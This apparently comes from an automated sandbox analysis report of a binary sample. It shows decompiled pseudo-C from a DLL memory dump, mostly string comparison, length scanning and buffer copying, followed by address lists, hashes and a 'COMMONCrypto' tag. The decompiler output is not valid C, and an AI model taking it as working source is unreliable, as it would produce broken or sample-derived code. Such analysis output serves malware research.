													continue;
												} else {
													_v20 = _t291;
													goto L136;
												}
												goto L179;
											}
											L161:
											_v20 = _t291;
											L162:
											__eflags = _t417;
											if(__eflags == 0) {
												L144:
												_t417 = 0x7fffffff;
												goto L145;
											} else {
												if(__eflags > 0) {
													L145:
													_v68 = _t417;
													_t296 = 0;
													__eflags = 0;
													_v36 = _t355;
													_v24 = _t275;
													while(1) {
														_t276 =  *((char*)(_t296 + _t307));
														_t357 =  *((char*)(_t296 + _v20));
														__eflags = _t276 - 0x61 - 0x19;
														_t277 =  <=  ? _t276 - 0x20 : _t276;
														__eflags = _t357 - 0x61 - 0x19;
														_t278 =  <=  ? _t276 - 0x20 : _t276;
														_t358 =  <=  ? _t357 - 0x20 : _t357;
														_t359 =  <=  ? _t357 - 0x20 : _t357;
														__eflags = _t278 - ( <=  ? _t357 - 0x20 : _t357);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t278;
														if(_t278 == 0) {
															L150:
															asm("o16 nop [eax+eax]");
															_t385 = _v60;
															_t333 = 0;
															__eflags = 0;
															goto L151;
														} else {
															_t296 = _t296 + 1;
															__eflags = _t296 - _v68;
															if(_t296 < _v68) {
																continue;
															} else {
																goto L150;
															}
														}
														goto L179;
													}
													_t360 = _v36;
													_t279 = _v24;
													_t421 = _t307 + 1;
													__eflags = _t421;
													if(_t421 == 0) {
														goto L54;
													} else {
														__eflags = _v44 - 0x19;
														_t298 =  <=  ? _v48 : _v40;
														_t291 =  <=  ? _v48 : _v40;
														__eflags =  *(_t307 + 1);
														if( *(_t307 + 1) == 0) {
															goto L54;
														} else {
															_v36 = _t360;
															_v24 = _t279;
															while(1) {
																_t307 = _t307 + 1;
																_t421 = _t421 + 1;
																_t361 =  *_t307 & 0x000000ff;
																__eflags =  *((char*)(_t421 - 1)) + 0xffffffbf - 0x19;
																_t362 =  <=  ? _t361 + 0x20 : _t361;
																__eflags = ( <=  ? _t361 + 0x20 : _t361) - _t291;
																if(( <=  ? _t361 + 0x20 : _t361) == _t291) {
																	goto L159;
																}
																__eflags =  *_t421;
																if( *_t421 != 0) {
																	continue;
																} else {
																	goto L54;
																}
																goto L179;
															}
															goto L159;
														}
													}
												} else {
													_v36 = _t355;
													_t333 = 0;
													_v24 = _t273;
													_t385 = _v60;
													L151:
													__eflags = _t307;
													if(_t307 != 0) {
														goto L49;
													} else {
														goto L55;
													}
												}
											}
										}
										L179:
										L159:
										_t355 = _v36;
										_t273 = _v24;
										__eflags = _t307;
									} while (_t307 != 0);
									goto L54;
								}
								break;
							}
							L55:
							_t386 = _t385 - _v64;
							__eflags = _t386;
							if(_t386 != 0) {
								__eflags = _v64;
								if(_v64 == 0) {
									_t334 = 0;
								} else {
									_t259 = _v64 & 0x0000000f;
									__eflags = _t259;
									if(_t259 == 0) {
										L69:
										_t334 =  ~( ~_t259 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										__eflags = _t334;
										while(1) {
											asm("movdqu xmm1, [ebx+eax]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb ecx, xmm1");
											__eflags = _t307;
											if(_t307 != 0) {
												break;
											}
											_t259 = _t259 + 0x10;
											__eflags = _t259 - _t334;
											if(_t259 < _t334) {
												continue;
											} else {
												__eflags = _t334 - 0x7fffffff;
												if(_t334 >= 0x7fffffff) {
													L76:
													_t334 = 0x7fffffff;
												} else {
													_t260 = _v64;
													while(1) {
														__eflags =  *((char*)(_t334 + _t260));
														if( *((char*)(_t334 + _t260)) == 0) {
															goto L77;
														}
														_t334 = _t334 + 1;
														__eflags = _t334 - 0x7fffffff;
														if(_t334 < 0x7fffffff) {
															continue;
														} else {
															goto L76;
														}
														goto L77;
													}
												}
											}
											goto L77;
										}
										asm("bsf edx, ecx");
										_t334 = _t334 + _t259;
									} else {
										_t334 = 0;
										_t307 = _v64;
										_t259 =  ~_t259 + 0x10;
										__eflags = _t259;
										while(1) {
											__eflags =  *((char*)(_t334 + _t307));
											if( *((char*)(_t334 + _t307)) == 0) {
												goto L77;
											}
											_t334 = _t334 + 1;
											__eflags = _t334 - _t259;
											if(_t334 < _t259) {
												continue;
											} else {
												goto L69;
											}
											goto L77;
										}
									}
								}
								L77:
								_t312 = _t334 >> 0x0000001f & _t334;
								_t335 = _t334 - _t312;
								__eflags = _t386;
								if(_t386 < 0) {
									L79:
									_t386 = _t335;
								} else {
									__eflags = _t386 - _t335;
									if(_t386 > _t335) {
										goto L79;
									}
								}
								_t336 = _a4;
								 *_t336 = 0;
								 *((intOrPtr*)(_t336 + 4)) = 0;
								_t293 = _t312 + _v64;
								__eflags = _t293;
								if(_t293 == 0) {
									L116:
									_push(0x40);
									_t287 = E6E791030();
									_t431 = _t431 + 4;
									_t239 =  *_a4;
									__eflags = _t239;
									if(_t239 == 0) {
										 *_t287 = 0;
									} else {
										__eflags = _t287;
										if(_t287 != 0) {
											_t337 =  *_t239;
											 *_t287 = _t337;
											__eflags = _t337;
											if(_t337 != 0) {
												_t338 = 0;
												__eflags = 0;
												while(1) {
													_t338 = _t338 + 1;
													_t313 =  *((char*)(_t239 + _t338 * 2 - 1));
													 *(_t287 + _t338 * 2 - 1) = _t313;
													__eflags = _t313;
													if(_t313 == 0) {
														goto L122;
													}
													_t314 =  *((char*)(_t239 + _t338 * 2));
													 *(_t287 + _t338 * 2) = _t314;
													__eflags = _t314;
													if(_t314 != 0) {
														continue;
													}
													goto L122;
												}
											}
										}
										L122:
										_push(1);
										_push(_t239);
										E6E7910B0();
										_t431 = _t431 + 8;
									}
									goto L124;
								} else {
									_t241 = _v64;
									__eflags =  *(_t241 + _t312);
									if( *(_t241 + _t312) == 0) {
										goto L116;
									} else {
										__eflags = _t386;
										if(_t386 == 0) {
											_t254 = _t241 + _t312;
											_v64 = _t254;
											_t255 = _t254 & 0x0000000f;
											__eflags = _t255;
											if(_t255 == 0) {
												L87:
												_t386 =  ~( ~_t255 + 0x0000000f & 0x0000000f) + 0x7fffffff;
												__eflags = _t386;
												while(1) {
													asm("movdqu xmm1, [ecx+eax]");
													asm("pcmpeqb xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t336;
													if(_t336 != 0) {
														break;
													}
													_t255 = _t255 + 0x10;
													__eflags = _t255 - _t386;
													if(_t255 < _t386) {
														continue;
													} else {
														__eflags = _t386 - 0x7fffffff;
														if(_t386 >= 0x7fffffff) {
															L94:
															_t386 = 0x7fffffff;
														} else {
															_t256 = _v64;
															while(1) {
																__eflags =  *((char*)(_t386 + _t256));
																if( *((char*)(_t386 + _t256)) == 0) {
																	goto L95;
																}
																_t386 = _t386 + 1;
																__eflags = _t386 - 0x7fffffff;
																if(_t386 < 0x7fffffff) {
																	continue;
																} else {
																	goto L94;
																}
																goto L95;
															}
														}
													}
													goto L95;
												}
												asm("bsf edi, edx");
												_t386 = _t386 + _t255;
											} else {
												_t386 = 0;
												_t336 = _v64;
												_t255 =  ~_t255 + 0x10;
												__eflags = _t255;
												while(1) {
													__eflags =  *((char*)(_t386 + _t336));
													if( *((char*)(_t386 + _t336)) == 0) {
														goto L95;
													}
													_t386 = _t386 + 1;
													__eflags = _t386 - _t255;
													if(_t386 < _t255) {
														continue;
													} else {
														goto L87;
													}
													goto L95;
												}
											}
										}
										L95:
										_t115 = _t386 + 1; // -2147483661
										_t339 = _t115;
										__eflags = _t339 - 0x40;
										_t340 =  <=  ? 0x40 : _t339;
										__eflags = _t340;
										if(_t340 > 0) {
											_t408 = (_t340 >> 5 >> 0x1a) + _t340 >> 6;
											_t341 = _t340 & 0x8000003f;
											__eflags = _t341;
											if(_t341 < 0) {
												_t341 = (_t341 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t341;
											}
											__eflags = _t341;
											_t410 = _t408 + (0 | _t341 > 0x00000000) << 6;
											_push(_t410);
											_t315 = E6E791030();
											_t431 = _t431 + 4;
											_t342 =  *_a4;
											__eflags = _t342;
											if(_t342 == 0) {
												 *_t315 = 0;
											} else {
												__eflags = _t315;
												if(_t315 != 0) {
													_t250 =  *_t342;
													 *_t315 = _t250;
													__eflags = _t250;
													if(_t250 != 0) {
														__eflags = 0;
														_v60 = _t386;
														_v68 = _t293;
														_t294 = 0;
														while(1) {
															_t294 = _t294 + 1;
															_t252 =  *((char*)(_t342 + _t294 * 2 - 1));
															 *(_t315 + _t294 * 2 - 1) = _t252;
															__eflags = _t252;
															if(_t252 == 0) {
																break;
															}
															_t253 =  *((char*)(_t342 + _t294 * 2));
															 *(_t315 + _t294 * 2) = _t253;
															__eflags = _t253;
															if(_t253 != 0) {
																continue;
															}
															break;
														}
														_t386 = _v60;
														_t293 = _v68;
													}
												}
												_push(1);
												_push(_t342);
												_v68 = _t315;
												E6E7910B0();
												_t315 = _v68;
												_t431 = _t431 + 8;
											}
											_t247 = _a4;
											_t247[1] = _t410;
											 *_t247 = _t315;
										} else {
											_t315 = 0;
										}
										__eflags = _t315;
										if(_t315 != 0) {
											_t343 = 0;
											while(1) {
												_t248 =  *_t293;
												_t343 = _t343 + 1;
												 *_t315 = _t248;
												__eflags = _t386;
												if(_t386 == 0) {
													goto L114;
												}
												__eflags = _t343 - _t386;
												if(_t343 == _t386) {
													 *(_t315 + 1) = 0;
												} else {
													goto L114;
												}
												goto L125;
												L114:
												__eflags = _t248;
												if(_t248 != 0) {
													_t315 = _t315 + 1;
													_t293 = _t293 + 1;
													__eflags = _t293;
													continue;
												}
												goto L125;
											}
										}
									}
								}
							} else {
								_t351 = _a4;
								_push(0x40);
								 *_t351 = 0;
								 *((intOrPtr*)(_t351 + 4)) = 0;
								_t287 = E6E791030();
								_t431 = _t431 + 4;
								_t265 =  *_a4;
								__eflags = _t265;
								if(_t265 == 0) {
									 *_t287 = 0;
								} else {
									__eflags = _t287;
									if(_t287 != 0) {
										_t352 =  *_t265;
										 *_t287 = _t352;
										__eflags = _t352;
										if(_t352 != 0) {
											_t353 = 0;
											__eflags = 0;
											while(1) {
												_t353 = _t353 + 1;
												_t317 =  *((char*)(_t265 + _t353 * 2 - 1));
												 *(_t287 + _t353 * 2 - 1) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													goto L62;
												}
												_t318 =  *((char*)(_t265 + _t353 * 2));
												 *(_t287 + _t353 * 2) = _t318;
												__eflags = _t318;
												if(_t318 != 0) {
													continue;
												}
												goto L62;
											}
										}
									}
									L62:
									_push(1);
									_push(_t265);
									E6E7910B0();
									_t431 = _t431 + 8;
								}
								L124:
								_t222 = _a4;
								 *_t222 = _t287;
								_t222[1] = 0x40;
							}
						}
					} else {
						goto L39;
					}
				}
				L125:
				_push(1);
				_push(_v56);
				E6E7910B0();
				_v56 = 0;
				_v52 = 0;
				return _a4;
				goto L179;
			}

0x6e7a1ebe
0x6e7a1ec2
0x6e7a1ec4
0x6e7a1ec8
0x6e7a1ecf
0x6e7a1ed1
0x6e7a1ed4
0x6e7a1eda
0x6e7a1f11
0x6e7a1edc
0x6e7a1ede
0x6e7a1ee0
0x6e7a1ee3
0x6e7a1ee7
0x6e7a1ee9
0x6e7a1eeb
0x6e7a1eeb
0x6e7a1eec
0x6e7a1ef1
0x6e7a1ef7
0x00000000
0x00000000
0x6e7a1ef9
0x6e7a1efd
0x6e7a1f02
0x00000000
0x00000000
0x00000000
0x6e7a1f02
0x6e7a1eeb
0x6e7a1ee7
0x6e7a1f04
0x6e7a1f04
0x6e7a1f06
0x6e7a1f07
0x6e7a1f0c
0x6e7a1f0c
0x6e7a1f14
0x6e7a1f18
0x6e7a1f20
0x6e7a1f26
0x6e7a1f31
0x6e7a1f33
0x6e7a269a
0x6e7a269f
0x6e7a1f39
0x6e7a1f3b
0x6e7a1f3b
0x6e7a1f3e
0x6e7a1f56
0x6e7a1f5a
0x6e7a1f66
0x6e7a1f66
0x6e7a1f6c
0x6e7a1f6c
0x6e7a1f71
0x6e7a1f75
0x6e7a1f79
0x6e7a1f7b
0x00000000
0x00000000
0x6e7a1f81
0x6e7a1f84
0x6e7a1f86
0x00000000
0x6e7a1f88
0x6e7a1f88
0x6e7a1f8e
0x6e7a1fa3
0x6e7a1fa3
0x6e7a1fa8
0x6e7a1f90
0x6e7a1f90
0x6e7a1f90
0x6e7a1f94
0x00000000
0x00000000
0x6e7a1f9a
0x6e7a1f9b
0x6e7a1fa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a1fa1
0x00000000
0x6e7a1f90
0x6e7a1f8e
0x00000000
0x6e7a1f86
0x6e7a2693
0x6e7a2696
0x00000000
0x6e7a1f40
0x6e7a1f42
0x6e7a1f44
0x6e7a1f44
0x6e7a1f47
0x6e7a1f47
0x6e7a1f4b
0x00000000
0x00000000
0x6e7a1f51
0x6e7a1f52
0x6e7a1f54
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a1f54
0x6e7a2678
0x6e7a2678
0x6e7a267b
0x6e7a2689
0x6e7a267d
0x6e7a267d
0x6e7a2680
0x6e7a2680
0x6e7a267b
0x6e7a1f3e
0x6e7a1fad
0x6e7a1fb2
0x6e7a1fb2
0x6e7a1fb5
0x6e7a1fb8
0x6e7a1fbb
0x6e7a1fbd
0x6e7a1fd2
0x6e7a1fd5
0x6e7a1fd5
0x6e7a1fdb
0x6e7a1fe3
0x6e7a1fe3
0x6e7a1fe3
0x6e7a1fe6
0x6e7a1fed
0x6e7a1ff0
0x6e7a1ff6
0x6e7a1ff8
0x6e7a1ffb
0x6e7a1fff
0x6e7a2001
0x6e7a2056
0x6e7a2003
0x6e7a2003
0x6e7a2005
0x6e7a2007
0x6e7a200a
0x6e7a200c
0x6e7a200e
0x6e7a2010
0x6e7a2014
0x6e7a2014
0x6e7a2016
0x6e7a201a
0x6e7a201d
0x6e7a201d
0x6e7a201e
0x6e7a2023
0x6e7a2027
0x6e7a2029
0x00000000
0x00000000
0x6e7a202b
0x6e7a202f
0x6e7a2032
0x6e7a2034
0x00000000
0x00000000
0x00000000
0x6e7a2034
0x6e7a2036
0x6e7a203a
0x6e7a203e
0x6e7a203e
0x6e7a200e
0x6e7a2041
0x6e7a2043
0x6e7a2044
0x6e7a2048
0x6e7a204d
0x6e7a2051
0x6e7a2051
0x6e7a2059
0x6e7a205d
0x6e7a1fbf
0x6e7a1fbf
0x6e7a1fbf
0x6e7a2065
0x6e7a2068
0x6e7a206e
0x6e7a1f28
0x6e7a1f28
0x6e7a1f28
0x6e7a2073
0x6e7a2077
0x6e7a2084
0x6e7a2084
0x6e7a2089
0x6e7a208b
0x6e7a208d
0x6e7a2095
0x6e7a2097
0x6e7a209d
0x6e7a20a1
0x6e7a20db
0x6e7a20a3
0x6e7a20a5
0x6e7a20a7
0x6e7a20aa
0x6e7a20ae
0x6e7a20b0
0x6e7a20b2
0x6e7a20b2
0x6e7a20b3
0x6e7a20b8
0x6e7a20be
0x00000000
0x00000000
0x6e7a20c0
0x6e7a20c4
0x6e7a20c9
0x00000000
0x00000000
0x00000000
0x6e7a20c9
0x6e7a20b2
0x6e7a20ae
0x6e7a20cb
0x6e7a20cb
0x6e7a20cd
0x6e7a20ce
0x6e7a20d3
0x6e7a20d3
0x00000000
0x6e7a2079
0x6e7a2079
0x6e7a207c
0x6e7a2082
0x6e7a20e7
0x6e7a20f0
0x6e7a20f2
0x6e7a20f4
0x6e7a2619
0x6e7a261e
0x6e7a2620
0x6e7a2622
0x6e7a262a
0x6e7a262c
0x6e7a2632
0x6e7a2634
0x6e7a2636
0x6e7a2670
0x6e7a2638
0x6e7a2638
0x6e7a263a
0x6e7a263c
0x6e7a263f
0x6e7a2641
0x6e7a2643
0x6e7a2645
0x6e7a2645
0x6e7a2647
0x6e7a2647
0x6e7a2648
0x6e7a264d
0x6e7a2651
0x6e7a2653
0x00000000
0x00000000
0x6e7a2655
0x6e7a2659
0x6e7a265c
0x6e7a265e
0x00000000
0x00000000
0x00000000
0x6e7a265e
0x6e7a2647
0x6e7a2643
0x6e7a2660
0x6e7a2660
0x6e7a2662
0x6e7a2663
0x6e7a2668
0x6e7a2668
0x00000000
0x6e7a20fa
0x6e7a20fa
0x6e7a2100
0x6e7a2103
0x6e7a2107
0x6e7a210b
0x6e7a2112
0x6e7a2120
0x6e7a2124
0x6e7a2128
0x6e7a2128
0x6e7a212a
0x6e7a212a
0x6e7a212c
0x6e7a212e
0x6e7a212e
0x6e7a212f
0x00000000
0x00000000
0x6e7a2131
0x6e7a2135
0x6e7a2137
0x6e7a213c
0x6e7a2142
0x6e7a2147
0x6e7a214a
0x6e7a214e
0x6e7a2152
0x6e7a2152
0x6e7a2153
0x6e7a2158
0x6e7a215b
0x6e7a2162
0x6e7a2165
0x6e7a216b
0x6e7a216e
0x6e7a2170
0x6e7a2174
0x00000000
0x00000000
0x6e7a217a
0x6e7a217d
0x00000000
0x6e7a217f
0x6e7a217f
0x6e7a217f
0x6e7a217f
0x00000000
0x6e7a217d
0x6e7a2482
0x6e7a2486
0x6e7a248a
0x6e7a248e
0x6e7a248e
0x6e7a2490
0x6e7a2492
0x6e7a24af
0x6e7a24bb
0x6e7a24bf
0x6e7a24bf
0x6e7a24c5
0x6e7a24c9
0x6e7a24c9
0x6e7a24ce
0x6e7a24d2
0x6e7a24d6
0x6e7a24d8
0x00000000
0x00000000
0x6e7a24de
0x6e7a24e1
0x6e7a24e3
0x00000000
0x6e7a24e5
0x6e7a24e5
0x6e7a24e9
0x6e7a24ed
0x6e7a24f3
0x00000000
0x6e7a24f5
0x6e7a24f5
0x6e7a24f9
0x6e7a24f9
0x6e7a24fd
0x00000000
0x00000000
0x6e7a2503
0x6e7a2504
0x6e7a250a
0x00000000
0x6e7a250c
0x6e7a250c
0x00000000
0x6e7a250c
0x00000000
0x6e7a250a
0x00000000
0x6e7a24f9
0x6e7a24f3
0x00000000
0x6e7a24e3
0x6e7a260a
0x6e7a260d
0x6e7a2611
0x6e7a2613
0x00000000
0x6e7a2494
0x6e7a2494
0x6e7a2498
0x6e7a249a
0x6e7a249a
0x6e7a249c
0x6e7a249c
0x6e7a24a0
0x00000000
0x00000000
0x6e7a24a6
0x6e7a24a7
0x6e7a24a9
0x00000000
0x6e7a24ab
0x6e7a24ab
0x00000000
0x6e7a24ab
0x00000000
0x6e7a24a9
0x6e7a25e5
0x6e7a25e5
0x6e7a25e9
0x6e7a25e9
0x6e7a25eb
0x6e7a2510
0x6e7a2510
0x00000000
0x6e7a25f1
0x6e7a25f1
0x6e7a2515
0x6e7a2515
0x6e7a2518
0x6e7a2518
0x6e7a251a
0x6e7a251e
0x6e7a2522
0x6e7a2526
0x6e7a252a
0x6e7a2531
0x6e7a253a
0x6e7a253d
0x6e7a2540
0x6e7a2546
0x6e7a2549
0x6e7a254c
0x6e7a254e
0x00000000
0x00000000
0x6e7a2552
0x6e7a2554
0x6e7a255c
0x6e7a255c
0x6e7a2562
0x6e7a2566
0x6e7a2566
0x00000000
0x6e7a2556
0x6e7a2556
0x6e7a2557
0x6e7a255a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a255a
0x00000000
0x6e7a2554
0x6e7a2575
0x6e7a2579
0x6e7a257f
0x6e7a257f
0x6e7a2580
0x00000000
0x6e7a2586
0x6e7a2586
0x6e7a258f
0x6e7a2594
0x6e7a2597
0x6e7a259b
0x00000000
0x6e7a25a1
0x6e7a25a1
0x6e7a25a5
0x6e7a25a9
0x6e7a25a9
0x6e7a25aa
0x6e7a25ab
0x6e7a25b5
0x6e7a25bb
0x6e7a25be
0x6e7a25c0
0x00000000
0x00000000
0x6e7a25c2
0x6e7a25c5
0x00000000
0x6e7a25c7
0x00000000
0x6e7a25c7
0x00000000
0x6e7a25c5
0x00000000
0x6e7a25a9
0x6e7a259b
0x6e7a25f7
0x6e7a25f7
0x6e7a25fb
0x6e7a25fd
0x6e7a2601
0x6e7a2568
0x6e7a2568
0x6e7a256a
0x00000000
0x6e7a2570
0x00000000
0x6e7a2570
0x6e7a256a
0x6e7a25f1
0x6e7a25eb
0x00000000
0x6e7a25d0
0x6e7a25d0
0x6e7a25d4
0x6e7a25d8
0x6e7a25d8
0x00000000
0x6e7a25e0
0x00000000
0x6e7a2135
0x6e7a2183
0x6e7a2183
0x6e7a2183
0x6e7a2187
0x6e7a21e8
0x6e7a21ed
0x6e7a247b
0x6e7a21f3
0x6e7a21f7
0x6e7a21f7
0x6e7a21fa
0x6e7a2212
0x6e7a2222
0x6e7a2222
0x6e7a2228
0x6e7a2228
0x6e7a222d
0x6e7a2231
0x6e7a2235
0x6e7a2237
0x00000000
0x00000000
0x6e7a223d
0x6e7a2240
0x6e7a2242
0x00000000
0x6e7a2244
0x6e7a2244
0x6e7a224a
0x6e7a225f
0x6e7a225f
0x6e7a224c
0x6e7a224c
0x6e7a2250
0x6e7a2250
0x6e7a2254
0x00000000
0x00000000
0x6e7a2256
0x6e7a2257
0x6e7a225d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a225d
0x6e7a2250
0x6e7a224a
0x00000000
0x6e7a2242
0x6e7a2471
0x6e7a2474
0x6e7a21fc
0x6e7a21fe
0x6e7a2200
0x6e7a2204
0x6e7a2204
0x6e7a2207
0x6e7a2207
0x6e7a220b
0x00000000
0x00000000
0x6e7a220d
0x6e7a220e
0x6e7a2210
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2210
0x6e7a2207
0x6e7a21fa
0x6e7a2264
0x6e7a2269
0x6e7a226b
0x6e7a226d
0x6e7a226f
0x6e7a2275
0x6e7a2275
0x6e7a2271
0x6e7a2271
0x6e7a2273
0x00000000
0x00000000
0x6e7a2273
0x6e7a2277
0x6e7a227e
0x6e7a2280
0x6e7a2283
0x6e7a2283
0x6e7a2287
0x6e7a23e1
0x6e7a23e1
0x6e7a23e8
0x6e7a23ea
0x6e7a23f0
0x6e7a23f2
0x6e7a23f4
0x6e7a242b
0x6e7a23f6
0x6e7a23f6
0x6e7a23f8
0x6e7a23fa
0x6e7a23fd
0x6e7a23ff
0x6e7a2401
0x6e7a2403
0x6e7a2403
0x6e7a2405
0x6e7a2405
0x6e7a2406
0x6e7a240b
0x6e7a240f
0x6e7a2411
0x00000000
0x00000000
0x6e7a2413
0x6e7a2417
0x6e7a241a
0x6e7a241c
0x00000000
0x00000000
0x00000000
0x6e7a241c
0x6e7a2405
0x6e7a2401
0x6e7a241e
0x6e7a241e
0x6e7a2420
0x6e7a2421
0x6e7a2426
0x6e7a2426
0x00000000
0x6e7a228d
0x6e7a228d
0x6e7a2291
0x6e7a2295
0x00000000
0x6e7a229b
0x6e7a229b
0x6e7a229d
0x6e7a229f
0x6e7a22a1
0x6e7a22a5
0x6e7a22a5
0x6e7a22a8
0x6e7a22c0
0x6e7a22d0
0x6e7a22d0
0x6e7a22d6
0x6e7a22d6
0x6e7a22db
0x6e7a22df
0x6e7a22e3
0x6e7a22e5
0x00000000
0x00000000
0x6e7a22eb
0x6e7a22ee
0x6e7a22f0
0x00000000
0x6e7a22f2
0x6e7a22f2
0x6e7a22f8
0x6e7a230d
0x6e7a230d
0x6e7a22fa
0x6e7a22fa
0x6e7a22fe
0x6e7a22fe
0x6e7a2302
0x00000000
0x00000000
0x6e7a2304
0x6e7a2305
0x6e7a230b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a230b
0x6e7a22fe
0x6e7a22f8
0x00000000
0x6e7a22f0
0x6e7a2467
0x6e7a246a
0x6e7a22aa
0x6e7a22ac
0x6e7a22ae
0x6e7a22b2
0x6e7a22b2
0x6e7a22b5
0x6e7a22b5
0x6e7a22b9
0x00000000
0x00000000
0x6e7a22bb
0x6e7a22bc
0x6e7a22be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a22be
0x6e7a22b5
0x6e7a22a8
0x6e7a2312
0x6e7a2317
0x6e7a2317
0x6e7a231a
0x6e7a231d
0x6e7a2320
0x6e7a2322
0x6e7a2335
0x6e7a2338
0x6e7a2338
0x6e7a233e
0x6e7a2346
0x6e7a2346
0x6e7a2346
0x6e7a2349
0x6e7a2350
0x6e7a2353
0x6e7a2359
0x6e7a235b
0x6e7a2361
0x6e7a2363
0x6e7a2365
0x6e7a23b4
0x6e7a2367
0x6e7a2367
0x6e7a2369
0x6e7a236b
0x6e7a236e
0x6e7a2370
0x6e7a2372
0x6e7a2374
0x6e7a2376
0x6e7a237a
0x6e7a237d
0x6e7a237f
0x6e7a237f
0x6e7a2380
0x6e7a2385
0x6e7a2389
0x6e7a238b
0x00000000
0x00000000
0x6e7a238d
0x6e7a2391
0x6e7a2394
0x6e7a2396
0x00000000
0x00000000
0x00000000
0x6e7a2396
0x6e7a2398
0x6e7a239c
0x6e7a239c
0x6e7a2372
0x6e7a239f
0x6e7a23a1
0x6e7a23a2
0x6e7a23a6
0x6e7a23ab
0x6e7a23af
0x6e7a23af
0x6e7a23b7
0x6e7a23ba
0x6e7a23bd
0x6e7a2324
0x6e7a2324
0x6e7a2324
0x6e7a23bf
0x6e7a23c1
0x6e7a23c3
0x6e7a23c9
0x6e7a23c9
0x6e7a23cc
0x6e7a23cd
0x6e7a23cf
0x6e7a23d1
0x00000000
0x00000000
0x6e7a23d3
0x6e7a23d5
0x6e7a2461
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a23db
0x6e7a23db
0x6e7a23dd
0x6e7a23c7
0x6e7a23c8
0x6e7a23c8
0x00000000
0x6e7a23c8
0x00000000
0x6e7a23dd
0x6e7a23c9
0x6e7a23c1
0x6e7a2295
0x6e7a2189
0x6e7a2189
0x6e7a218e
0x6e7a2190
0x6e7a2192
0x6e7a219a
0x6e7a219c
0x6e7a21a2
0x6e7a21a4
0x6e7a21a6
0x6e7a21e0
0x6e7a21a8
0x6e7a21a8
0x6e7a21aa
0x6e7a21ac
0x6e7a21af
0x6e7a21b1
0x6e7a21b3
0x6e7a21b5
0x6e7a21b5
0x6e7a21b7
0x6e7a21b7
0x6e7a21b8
0x6e7a21bd
0x6e7a21c1
0x6e7a21c3
0x00000000
0x00000000
0x6e7a21c5
0x6e7a21c9
0x6e7a21cc
0x6e7a21ce
0x00000000
0x00000000
0x00000000
0x6e7a21ce
0x6e7a21b7
0x6e7a21b3
0x6e7a21d0
0x6e7a21d0
0x6e7a21d2
0x6e7a21d3
0x6e7a21d8
0x6e7a21d8
0x6e7a242e
0x6e7a242e
0x6e7a2431
0x6e7a2433
0x6e7a2433
0x6e7a2187
0x00000000
0x00000000
0x00000000
0x6e7a2082
0x6e7a243a
0x6e7a243a
0x6e7a243c
0x6e7a2440
0x6e7a244a
0x6e7a244e
0x6e7a245e
0x00000000

Strings

@, xrefs: 6E7A1F18

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction ID: 2ee028e0a02b8e1a7ceac762cb81a54540832fa2aeab8aee2321a8186f5e4012
Opcode Fuzzy Hash: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction Fuzzy Hash: 483209716093D28BD705CEAEC59031A7BE66FC6310F15877DEAA48B2B5EB35C8418B42

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A26B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E6E7A26B0(signed int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t183;
				signed int _t184;
				signed int* _t190;
				signed int _t194;
				signed int* _t195;
				signed int _t200;
				signed int _t204;
				void* _t206;
				signed int _t209;
				signed int _t212;
				signed int _t217;
				signed int* _t219;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t235;
				char _t236;
				signed int _t240;
				void* _t241;
				void* _t242;
				unsigned int _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				char _t260;
				char _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t280;
				void* _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t303;
				signed int _t305;
				char _t306;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t329;
				char _t331;
				char _t332;
				char _t333;
				signed int _t335;
				unsigned int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr _t346;
				signed int _t347;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t383;
				signed int _t384;
				void* _t387;

				_v52 = 0;
